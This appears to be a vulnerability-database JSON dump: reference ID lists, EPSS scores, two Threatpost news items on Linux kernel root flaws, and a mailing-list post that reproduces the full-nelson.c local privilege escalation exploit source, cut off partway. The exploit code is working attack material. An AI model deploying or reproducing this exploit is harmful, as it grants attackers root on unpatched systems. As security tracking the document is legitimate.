"OPENVAS:136141256231066219", "OPENVAS:136141256231066276", "OPENVAS:136141256231066280", "OPENVAS:136141256231066289", "OPENVAS:136141256231066352", "OPENVAS:136141256231066452", "OPENVAS:136141256231066460", "OPENVAS:136141256231066509", "OPENVAS:136141256231066581", "OPENVAS:136141256231067981", "OPENVAS:136141256231068662", "OPENVAS:136141256231068992", "OPENVAS:1361412562310830336", "OPENVAS:1361412562310830754", "OPENVAS:1361412562310831170", "OPENVAS:1361412562310831196", "OPENVAS:1361412562310831274", "OPENVAS:1361412562310831290", "OPENVAS:1361412562310831331", "OPENVAS:1361412562310840440", "OPENVAS:1361412562310840441", "OPENVAS:1361412562310840482", "OPENVAS:1361412562310840486", "OPENVAS:1361412562310840523", "OPENVAS:1361412562310840544", "OPENVAS:1361412562310840605", "OPENVAS:1361412562310840632", "OPENVAS:1361412562310840638", "OPENVAS:1361412562310840651", "OPENVAS:1361412562310840693", "OPENVAS:1361412562310840699", "OPENVAS:1361412562310840720", "OPENVAS:1361412562310840745", "OPENVAS:1361412562310850120", "OPENVAS:1361412562310850125", "OPENVAS:1361412562310850142", "OPENVAS:1361412562310850143", "OPENVAS:1361412562310850147", "OPENVAS:1361412562310850155", "OPENVAS:1361412562310850156", "OPENVAS:1361412562310850157", "OPENVAS:1361412562310850159", "OPENVAS:1361412562310850163", "OPENVAS:1361412562310850165", "OPENVAS:1361412562310861615", "OPENVAS:1361412562310861694", "OPENVAS:1361412562310861742", "OPENVAS:1361412562310861964", "OPENVAS:1361412562310862161", "OPENVAS:1361412562310862250", "OPENVAS:1361412562310862301", "OPENVAS:1361412562310862344", "OPENVAS:1361412562310862366", "OPENVAS:1361412562310862415", "OPENVAS:1361412562310862654", "OPENVAS:1361412562310862703", "OPENVAS:1361412562310862706", "OPENVAS:1361412562310862713", "OPENVAS:1361412562310862749", "OPENVAS:1361412562310862842", "OPENVAS:1361412562310862910", "OPENVAS:1361412562310863087", "OPENVAS:1361412562310863279", "OPENVAS:1361412562310863292", "OPENVAS:1361412562310863447", "OPENVAS:1361412562310863571", "OPENVAS:1361412562310863604", "OPENVAS:1361412562310863606", "OPENVAS:1361412562310863647", "OPENVAS:1361412562310870022", "OPENVAS:1361412562310870061", "OPENVAS:1361412562310870088", "OPENVAS:1361412562310870349", "OPENVAS:1361412562310870378", "OPENVAS:1361412562310870380", "OPENVAS:1361412562310870652", "OPENVAS:1361412562310880041", "OPENVAS:1361412562310880079", "OPENVAS:1361412562310880082", "OPENVAS:1361412562310880111", "OPENVAS:1361412562310880459", "OPENVAS:1361412562310880640", "OPENVAS:1361412562310880685", "OPENVAS:1361412562310880731", "OPENVAS:1361412562310880808", "OPENVAS:1361412562310880838", "OPENVAS:1361412562310880841", "OPENVAS:1361412562310880869", "OPENVAS:1361412562310880937", "OPENVAS:1361412562310880944", "OPENVAS:1361412562310881399", "OPENVAS:58636", "OPENVAS:58637", "OPENVAS:58641", "OPENVAS:58667", "OPENVAS:60438", "OPENVAS:61775", "OPENVAS:63097", "OPENVAS:63132", "OPENVAS:63344", "OPENVAS:63908", "OPENVAS:63939", "OPENVAS:63947", "OPENVAS:63959", "OPENVAS:63970", "OPENVAS:63978", "OPENVAS:64034", "OPENVAS:64067", "OPENVAS:64074", "OPENVAS:64131", "OPENVAS:64175", "OPENVAS:64187", "OPENVAS:64188", "OPENVAS:64189", "OPENVAS:64220", "OPENVAS:64668", "OPENVAS:64669", "OPENVAS:64671", "OPENVAS:64677", "OPENVAS:64703", "OPENVAS:64704", "OPENVAS:64707", "OPENVAS:64736", "OPENVAS:64745", "OPENVAS:64747", "OPENVAS:64748", "OPENVAS:64761", "OPENVAS:64771", "OPENVAS:64791", "OPENVAS:64792", "OPENVAS:64794", "OPENVAS:64795", "OPENVAS:64906", "OPENVAS:64923", "OPENVAS:64943", "OPENVAS:64999", "OPENVAS:65059", "OPENVAS:65259", "OPENVAS:65354", "OPENVAS:65365", "OPENVAS:65670", "OPENVAS:65709", "OPENVAS:65812", "OPENVAS:65814", "OPENVAS:65914", "OPENVAS:65924", "OPENVAS:66048", "OPENVAS:66174", "OPENVAS:66175", "OPENVAS:66176", "OPENVAS:66178", "OPENVAS:66200", "OPENVAS:66202", "OPENVAS:66207", "OPENVAS:66208", "OPENVAS:66209", "OPENVAS:66217", "OPENVAS:66218", "OPENVAS:66219", "OPENVAS:66276", "OPENVAS:66280", "OPENVAS:66289", "OPENVAS:66352", "OPENVAS:66452", "OPENVAS:66460", "OPENVAS:66509", "OPENVAS:66581", "OPENVAS:67981", "OPENVAS:68662", "OPENVAS:68992", "OPENVAS:830336", "OPENVAS:830754", "OPENVAS:831170", "OPENVAS:831196", "OPENVAS:831274", "OPENVAS:831290", "OPENVAS:831331", "OPENVAS:840149", "OPENVAS:840288", "OPENVAS:840440", "OPENVAS:840441", "OPENVAS:840482", "OPENVAS:840486", "OPENVAS:840523", "OPENVAS:840544", "OPENVAS:840605", "OPENVAS:840632", "OPENVAS:840638", "OPENVAS:840651", "OPENVAS:840693", "OPENVAS:840699", "OPENVAS:840720", "OPENVAS:840745", "OPENVAS:850001", "OPENVAS:850005", "OPENVAS:850086", "OPENVAS:850097", "OPENVAS:850120", "OPENVAS:850125", "OPENVAS:850142", "OPENVAS:850143", "OPENVAS:850147", "OPENVAS:850155", "OPENVAS:850156", "OPENVAS:850157", "OPENVAS:850159", "OPENVAS:850163", "OPENVAS:850165", "OPENVAS:860042", "OPENVAS:860126", "OPENVAS:861315", "OPENVAS:861615", "OPENVAS:861694", "OPENVAS:861742", "OPENVAS:861964", "OPENVAS:862161", "OPENVAS:862250", "OPENVAS:862301", "OPENVAS:862344", "OPENVAS:862366", "OPENVAS:862415", "OPENVAS:862654", "OPENVAS:862703", "OPENVAS:862706", "OPENVAS:862713", "OPENVAS:862749", "OPENVAS:862842", "OPENVAS:862910", "OPENVAS:863087", "OPENVAS:863279", "OPENVAS:863292", "OPENVAS:863447", "OPENVAS:863571", "OPENVAS:863604", "OPENVAS:863606", "OPENVAS:863647", "OPENVAS:870022", "OPENVAS:870061", "OPENVAS:870088", "OPENVAS:870349", "OPENVAS:870378", "OPENVAS:870380", "OPENVAS:870652", "OPENVAS:880041", "OPENVAS:880079", "OPENVAS:880082", "OPENVAS:880111", "OPENVAS:880459", "OPENVAS:880640", "OPENVAS:880685", "OPENVAS:880731", "OPENVAS:880808", "OPENVAS:880838", "OPENVAS:880841", "OPENVAS:880869", "OPENVAS:880937", "OPENVAS:880944", "OPENVAS:881399"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0936", "ELSA-2007-0937", "ELSA-2008-0957", "ELSA-2008-0972", "ELSA-2008-0973", "ELSA-2009-0225", "ELSA-2009-0473", "ELSA-2009-1024", "ELSA-2009-1222", "ELSA-2009-1223", "ELSA-2009-1233", "ELSA-2009-1243", "ELSA-2009-1541", "ELSA-2009-1548", "ELSA-2009-1550", "ELSA-2010-0178", "ELSA-2010-0792", "ELSA-2010-0839", "ELSA-2010-2009", "ELSA-2010-2010", "ELSA-2011-0007", "ELSA-2011-0017", "ELSA-2011-0162", "ELSA-2011-0263", "ELSA-2011-0498"]}, {"type": "osv", "idList": ["OSV:DSA-1378-1", "OSV:DSA-1378-2", "OSV:DSA-1381-2", "OSV:DSA-1504-1", "OSV:DSA-1653-1", "OSV:DSA-1787-1", "OSV:DSA-1794-1", "OSV:DSA-1800-1", "OSV:DSA-1862-1", "OSV:DSA-1864-1", "OSV:DSA-1865-1", "OSV:DSA-1927-1", "OSV:DSA-1928-1", "OSV:DSA-1929-1", "OSV:DSA-2094-1", "OSV:DSA-2126-1", "OSV:DSA-2153-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:104820", "PACKETSTORM:105078", "PACKETSTORM:114856", "PACKETSTORM:147703", "PACKETSTORM:155751", "PACKETSTORM:76444", "PACKETSTORM:88223"]}, {"type": "redhat", "idList": ["RHSA-2007:0936", "RHSA-2007:0937", "RHSA-2007:0938", "RHSA-2008:0787", "RHSA-2008:0957", "RHSA-2008:0972", "RHSA-2008:0973", "RHSA-2009:0001", "RHSA-2009:0451", "RHSA-2009:0473", "RHSA-2009:1024", "RHSA-2009:1077", "RHSA-2009:1222", "RHSA-2009:1223", "RHSA-2009:1233", "RHSA-2009:1239", "RHSA-2009:1457", "RHSA-2009:1469", "RHSA-2009:1540", "RHSA-2009:1541", "RHSA-2009:1548", "RHSA-2009:1550", "RHSA-2009:1587", "RHSA-2009:1588", "RHSA-2009:1672", "RHSA-2009:1692", "RHSA-2010:0792", "RHSA-2010:0842", "RHSA-2010:0958", "RHSA-2011:0007", "RHSA-2011:0017", "RHSA-2011:0162", "RHSA-2011:0330"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18087", "SECURITYVULNS:DOC:18111", "SECURITYVULNS:DOC:18851", "SECURITYVULNS:DOC:20702", "SECURITYVULNS:DOC:21767", "SECURITYVULNS:DOC:22752", "SECURITYVULNS:DOC:24978", "SECURITYVULNS:DOC:25229", "SECURITYVULNS:DOC:25260", "SECURITYVULNS:DOC:25594", "SECURITYVULNS:DOC:26323", "SECURITYVULNS:VULN:10150", "SECURITYVULNS:VULN:10380", "SECURITYVULNS:VULN:11211", "SECURITYVULNS:VULN:11275", "SECURITYVULNS:VULN:8184", "SECURITYVULNS:VULN:8563", "SECURITYVULNS:VULN:9357", "SECURITYVULNS:VULN:9889"]}, {"type": "seebug", "idList": ["SSV:11780", "SSV:12073", "SSV:12103", "SSV:12576", "SSV:12593", "SSV:19436", "SSV:20073", "SSV:20191", "SSV:20199", "SSV:20280", "SSV:20296", "SSV:20924", "SSV:2921", "SSV:4118", "SSV:66685", "SSV:66827", "SSV:66828", "SSV:69718", "SSV:70036", "SSV:70365", "SSV:70421", "SSV:72066"]}, {"type": "slackware", "idList": ["SSA-2009-230-01"]}, {"type": "suse", "idList": ["SUSE-SA:2007:053", "SUSE-SA:2007:064", "SUSE-SA:2008:051", "SUSE-SA:2008:056", "SUSE-SA:2008:057", "SUSE-SA:2009:017", "SUSE-SA:2009:028", "SUSE-SA:2009:030", "SUSE-SA:2009:031", "SUSE-SA:2009:032", "SUSE-SA:2009:033", "SUSE-SA:2009:045", "SUSE-SA:2009:054", "SUSE-SA:2009:055", "SUSE-SA:2009:056", "SUSE-SA:2009:060", "SUSE-SA:2010:001", "SUSE-SA:2010:012", "SUSE-SA:2010:040", "SUSE-SA:2010:041", "SUSE-SA:2010:043", "SUSE-SA:2010:044", "SUSE-SA:2010:045", "SUSE-SA:2010:046", "SUSE-SA:2010:047", "SUSE-SA:2010:053", "SUSE-SA:2010:057", "SUSE-SA:2010:060", "SUSE-SA:2011:001", "SUSE-SA:2011:002", "SUSE-SA:2011:004", "SUSE-SA:2011:005", "SUSE-SA:2011:007", "SUSE-SA:2011:008", "SUSE-SA:2011:017", "SUSE-SA:2011:020"]}, {"type": "threatpost", "idList": ["THREATPOST:5C498E77806919FE36F529695A6607BA", "THREATPOST:9B247D64D74F86C01215CC8DF7D85698"]}, {"type": "ubuntu", "idList": ["USN-1000-1", "USN-1023-1", "USN-1054-1", "USN-1073-1", "USN-1074-1", "USN-1074-2", "USN-1083-1", "USN-1093-1", "USN-1105-1", "USN-1111-1", "USN-1119-1", "USN-1164-1", "USN-1186-1", "USN-1202-1", "USN-518-1", "USN-679-1", "USN-751-1", "USN-793-1", "USN-819-1", "USN-864-1", "USN-947-1", "USN-947-2", "USN-974-1", "USN-974-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2007-4573", "UB:CVE-2008-0009", "UB:CVE-2008-0600", "UB:CVE-2008-3833", "UB:CVE-2008-4210", "UB:CVE-2009-1046", "UB:CVE-2009-1337", "UB:CVE-2009-2692", "UB:CVE-2009-3547", "UB:CVE-2010-1146", "UB:CVE-2010-2959", "UB:CVE-2010-3301", "UB:CVE-2010-3848", "UB:CVE-2010-3849", "UB:CVE-2010-3850", "UB:CVE-2010-3904", "UB:CVE-2010-4073", "UB:CVE-2010-4258", "UB:CVE-2010-4347", "UB:CVE-2011-1021"]}, {"type": "veracode", "idList": ["VERACODE:23198", "VERACODE:23467", "VERACODE:23614", "VERACODE:23778", "VERACODE:23845", "VERACODE:23879", "VERACODE:24250", "VERACODE:24466", "VERACODE:24699"]}, {"type": "vmware", "idList": ["VMSA-2009-0014", "VMSA-2009-0014.3", "VMSA-2009-0016", "VMSA-2009-0016.6", "VMSA-2010-0004", "VMSA-2010-0004.5", "VMSA-2010-0009", "VMSA-2010-0009.2", "VMSA-2010-0010", "VMSA-2011-0012", "VMSA-2011-0012.3"]}, {"type": "zdt", "idList": ["1337DAY-ID-26409", "1337DAY-ID-30386", "1337DAY-ID-30402", "1337DAY-ID-33692"]}]}, "backreferences": {"references": [{"type": "android", "idList": ["ANDROID:SOCK_SENDPAGE"]}, {"type": "canvas", "idList": ["FS_PIPE_RACE_TO_NULL", "LINUX_RDS"]}, {"type": "centos", "idList": ["CESA-2008:0957", "CESA-2008:0972", "CESA-2008:0973", "CESA-2009:0001-01", "CESA-2009:0473", "CESA-2009:1222", "CESA-2009:1223", "CESA-2009:1233", "CESA-2009:1541", "CESA-2009:1548", "CESA-2009:1550", "CESA-2010:0792", "CESA-2011:0162"]}, {"type": "checkpoint_security", "idList": ["CPS:SK42600"]}, {"type": "cve", "idList": ["CVE-2007-4573", "CVE-2008-0009"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1864-1:B2834"]}, {"type": "exploitdb", "idList": ["EDB-ID:9083"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:587E07B26CFC9328AECA2A6FF11BCAF8"]}, {"type": "f5", "idList": ["SOL10772", "SOL16341", "SOL16489", "SOL8171"]}, {"type": "fedora", "idList": ["FEDORA:101AF111631", "FEDORA:6F955210EC"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/RDS_PRIV_ESC/", "MSF:EXPLOIT/LINUX/LOCAL/RDS_RDS_PAGE_COPY_USER_PRIV_ESC/"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1794.NASL", "DEBIAN_DSA-1865.NASL", "DEBIAN_DSA-1928.NASL", "FEDORA_2008-1423.NASL", "FEDORA_2010-7779.NASL", "MANDRIVA_MDVSA-2009-135.NASL", "ORACLELINUX_ELSA-2009-1541.NASL", "ORACLEVM_OVMSA-2009-0009.NASL", "REDHAT-RHSA-2009-1587.NASL", "REDHAT-RHSA-2010-0842.NASL", "SLACKWARE_SSA_2009-230-01.NASL", "SUSE_KERNEL-4471.NASL", "UBUNTU_USN-1000-1.NASL", "UBUNTU_USN-974-1.NASL", "VMWARE_VMSA-2011-0012_REMOTE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122422", "OPENVAS:136141256231063132", "OPENVAS:136141256231064074", "OPENVAS:136141256231064669", "OPENVAS:136141256231064677", "OPENVAS:136141256231064704", "OPENVAS:136141256231064747", "OPENVAS:136141256231065259", "OPENVAS:136141256231066178", "OPENVAS:136141256231068662", "OPENVAS:1361412562310840605", "OPENVAS:1361412562310863447", "OPENVAS:1361412562310870380", "OPENVAS:1361412562310880838", "OPENVAS:64187", "OPENVAS:64745", "OPENVAS:64906", "OPENVAS:831196", "OPENVAS:840441", "OPENVAS:860126", "OPENVAS:880459", "OPENVAS:880731", "OPENVAS:880937"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0937", "ELSA-2008-0957", "ELSA-2008-0972", "ELSA-2008-0973", "ELSA-2009-0225", "ELSA-2009-1541", "ELSA-2009-1548", "ELSA-2009-1550", "ELSA-2010-0792", "ELSA-2010-0839", "ELSA-2010-2009", "ELSA-2010-2010", "ELSA-2011-0007", "ELSA-2011-0162", "ELSA-2011-0263", "ELSA-2011-0498"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:114856"]}, {"type": "redhat", "idList": ["RHSA-2008:0957", "RHSA-2008:0972", "RHSA-2008:0973", "RHSA-2009:1024", "RHSA-2009:1077", "RHSA-2009:1541", "RHSA-2009:1548", "RHSA-2009:1588", "RHSA-2009:1692", "RHSA-2010:0842", "RHSA-2011:0007", "RHSA-2011:0017", "RHSA-2011:0162"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26323", "SECURITYVULNS:VULN:12590", "SECURITYVULNS:VULN:8184"]}, {"type": "seebug", "idList": ["SSV:12576", "SSV:20924", "SSV:2921", "SSV:70036"]}, {"type": "slackware", "idList": ["SSA-2009-230-01"]}, {"type": "suse", "idList": ["SUSE-SA:2010:045", "SUSE-SA:2010:060", "SUSE-SA:2011:007"]}, {"type": "ubuntu", "idList": ["USN-1074-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2008-0009", "UB:CVE-2010-2959", "UB:CVE-2010-3904"]}, {"type": "vmware", "idList": ["VMSA-2011-0012.3"]}, {"type": "zdt", "idList": ["1337DAY-ID-33692"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "epss": [{"cve": "CVE-2010-3904", "epss": "0.000700000", "percentile": "0.284310000", "modified": "2023-03-19"}, {"cve": "CVE-2007-4573", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-4073", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2009-2692", "epss": "0.000580000", "percentile": "0.219710000", "modified": "2023-03-19"}, {"cve": "CVE-2009-1046", "epss": "0.000710000", "percentile": "0.289790000", "modified": "2023-03-19"}, {"cve": "CVE-2010-2959", "epss": "0.002750000", "percentile": "0.630670000", "modified": "2023-03-20"}, {"cve": "CVE-2008-0009", "epss": "0.000430000", "percentile": "0.077800000", "modified": "2023-03-20"}, {"cve": "CVE-2010-1146", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-20"}, {"cve": "CVE-2010-3850", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2010-4258", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2009-3547", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-3848", "epss": "0.000440000", "percentile": "0.082520000", "modified": "2023-03-19"}, {"cve": "CVE-2009-1337", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-4347", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}, {"cve": "CVE-2008-4210", "epss": "0.000420000", "percentile": "0.004970000", "modified": "2023-03-19"}, {"cve": "CVE-2010-3849", "epss": "0.000440000", "percentile": "0.081850000", "modified": "2023-03-19"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1678962961, "score": 1678963748, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "4a639e1a5f351a495492666757b36d3b"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}

{"threatpost": [{"lastseen": "2018-10-06T23:06:30", "description": "An interesting exploit for the Linux kernel that enables an attacker to escalate his privileges on a local machine has popped up on the Full Disclosure mailing list. The exploit chains together three separate bugs to get root on a vulnerable machine.\n\nThe exploit was [posted Tuesday by Dan Rosenberg on Full Disclosure](<http://seclists.org/fulldisclosure/2010/Dec/85>) and he explains in his post that the exploit is specifically designed to be somewhat limited so that it\u2019s not easily usable by low-level attackers. The exploit affects Linux kernel version 2.6.37, however two of the bugs that Rosenberg uses in the exploit have been patched by two of the major Linux distributions. \n\n\u201cIn the interest of public safety, this exploit was specifically designed to be limited: \n* The particular symbols I resolve are not exported on Slackware or Debian \n* Red Hat does not support Econet by default \n* CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and Debian \nHowever, the important issue, CVE-2010-4258, affects everyone, and it would be trivial to find an unpatched DoS under KERNEL_DS and write a slightly more sophisticated version of this that doesn\u2019t have the roadblocks I put in to prevent abuse by script kiddies,\u201d Rosenberg wrote.\n\nThe most interesting of the three vulnerabilities, however, is a recent one that is still unpatched in the Linux kernel. The bug is a[ local address limit override vulnerability](<http://www.securityfocus.com/bid/45159>). \n\n\u201cThis is the interesting one, and the reason I wrote this exploit. If a thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL word will be written to a user-specified pointer when that thread exits. This write is done using put_user(), which ensures the provided destination resides in valid userspace by invoking access_ok(). However, Nelson discovered that when the kernel performs an address limit override via set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, etc.), this override is not reverted before calling put_user() in the exit path, allowing a user to write a NULL word to an arbitrary kernel address. Note that this issue requires an additional vulnerability to trigger,\u201d Rosenberg wrote in his advisory.\n", "cvss3": {}, "published": "2010-12-08T15:33:53", "type": "threatpost", "title": "New Local Linux Kernel Root Exploit Published", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3849", "CVE-2010-3850", "CVE-2010-4258"], "modified": "2013-04-17T16:35:33", "id": "THREATPOST:5C498E77806919FE36F529695A6607BA", "href": "https://threatpost.com/new-local-linux-kernel-root-exploit-published-120810/74750/", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:19", "description": "Th[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054316/linux_kernel_flaw_small.jpg)](<https://threatpost.com/critical-flaw-found-linux-kernel-110509/>)ere is a [NULL pointer dereference flaw in the Linux kernel](<http://lkml.org/lkml/2009/10/14/184>) that can be exploited by attackers to gain root access to a vulnerable machine.\n\nThe vulnerability is in version 2.6.21 of the Linux kernel and some Linux vendors already have taken steps to fix the vulnerability. Red Hat has released a [fix for the flaw](<https://rhn.redhat.com/cve/CVE-2009-3547.html>) in several versions of its Linux distributions. Red Hat also has released advisories on the issue, explaining the vulnerability and its effect on vulnerable machines.\n\nA NULL pointer dereference flaw was found in each of the following functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe\u2019s reader and writer counters. This could lead to a local denial of service or privilege escalation.\n\nDebian also has posted instructions for addressing the [flaw in its Linux distributions](<http://wiki.debian.org/mmap_min_addr>), which are vulnerable to this problem by default. NULL pointer dereferences are particularly complex problems that are difficult to exploit in many cases. This particular problem was identified in mid-October and so far, there have not been any public exploits released for the Linux kernel flaw.\n", "cvss3": {}, "published": "2009-11-05T13:45:39", "type": "threatpost", "title": "Critical Flaw Found in Linux Kernel", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3547"], "modified": "2018-08-15T14:16:20", "id": "THREATPOST:9B247D64D74F86C01215CC8DF7D85698", "href": "https://threatpost.com/critical-flaw-found-linux-kernel-110509/73037/", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "description": "Hi all,\r\n\r\nI've included here a proof-of-concept local privilege escalation exploit\r\nfor Linux. Please read the header for an explanation of what's going\r\non. Without further ado, I present full-nelson.c:\r\n\r\nHappy hacking,\r\nDan\r\n\r\n\r\n--snip--\r\n\r\n/*\r\n * Linux Kernel <= 2.6.37 local privilege escalation\r\n * by Dan Rosenberg\r\n * @djrbliss on twitter\r\n *\r\n * Usage:\r\n * gcc full-nelson.c -o full-nelson\r\n * ./full-nelson\r\n *\r\n * This exploit leverages three vulnerabilities to get root, all of which were\r\n * discovered by Nelson Elhage:\r\n *\r\n * CVE-2010-4258\r\n * -------------\r\n * This is the interesting one, and the reason I wrote this exploit. If a\r\n * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL\r\n * word will be written to a user-specified pointer when that thread exits.\r\n * This write is done using put_user(), which ensures the provided destination\r\n * resides in valid userspace by invoking access_ok(). However, Nelson\r\n * discovered that when the kernel performs an address limit override via\r\n * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,\r\n * etc.), this override is not reverted before calling put_user() in the exit\r\n * path, allowing a user to write a NULL word to an arbitrary kernel address.\r\n * Note that this issue requires an additional vulnerability to trigger.\r\n *\r\n * CVE-2010-3849\r\n * -------------\r\n * This is a NULL pointer dereference in the Econet protocol. By itself, it's\r\n * fairly benign as a local denial-of-service. It's a perfect candidate to\r\n * trigger the above issue, since it's reachable via sock_no_sendpage(), which\r\n * subsequently calls sendmsg under KERNEL_DS.\r\n *\r\n * CVE-2010-3850\r\n * -------------\r\n * I wouldn't be able to reach the NULL pointer dereference and trigger the\r\n * OOPS if users weren't able to assign Econet addresses to arbitrary\r\n * interfaces due to a missing capabilities check.\r\n *\r\n * In the interest of public safety, this exploit was specifically designed to\r\n * be limited:\r\n *\r\n * * The particular symbols I resolve are not exported on Slackware or Debian\r\n * * Red Hat does not support Econet by default\r\n * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and\r\n * Debian\r\n *\r\n * However, the important issue, CVE-2010-4258, affects everyone, and it would\r\n * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly\r\n * more sophisticated version of this that doesn't have the roadblocks I put in\r\n * to prevent abuse by script kiddies.\r\n *\r\n * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.\r\n *\r\n * NOTE: the exploit process will deadlock and stay in a zombie state after you\r\n * exit your root shell because the Econet thread OOPSes while holding the\r\n * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.\r\n *\r\n * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <string.h>\r\n#include <net/if.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <sys/utsname.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n\r\n/* How many bytes should we clear in our\r\n * function pointer to put it into userspace? */\r\n#ifdef __x86_64__\r\n#define SHIFT 24\r\n#define OFFSET 3\r\n#else\r\n#define SHIFT 8\r\n#define OFFSET 1\r\n#endif\r\n\r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n\r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n\r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n\r\n}\r\n\r\n/* Why do I do this? Because on x86-64, the address of\r\n * commit_creds and prepare_kernel_cred are loaded relative\r\n * to rip, which means I can't just copy the above payload\r\n * into my landing area. */\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n\r\n#ifdef __x86_64__\r\n asm("mov $getroot, %rax; call *%rax;");\r\n#else\r\n asm("mov $getroot, %eax; call *%eax;");\r\n#endif\r\n\r\n}\r\n\r\n/* Triggers a NULL pointer dereference in econet_sendmsg\r\n * via sock_no_sendpage, so it's under KERNEL_DS */\r\nint trigger(int * fildes)\r\n{\r\n int ret;\r\n struct ifreq ifr;\r\n\r\n memset(&ifr, 0, sizeof(ifr));\r\n strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);\r\n\r\n ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);\r\n\r\n if(ret < 0) {\r\n printf("[*] Failed to set Econet address.\n");\r\n return -1;\r\n }\r\n\r\n splice(fildes[3], NULL, fildes[1], NULL, 128, 0);\r\n splice(fildes[0], NULL, fildes[2], NULL, 128, 0);\r\n\r\n /* Shouldn't get here... */\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long econet_ops, econet_ioctl, target, landing;\r\n int fildes[4], pid;\r\n void * newstack, * payload;\r\n\r\n /* Create file descriptors now so there are two\r\n references to them after cloning...otherwise\r\n the child will never return because 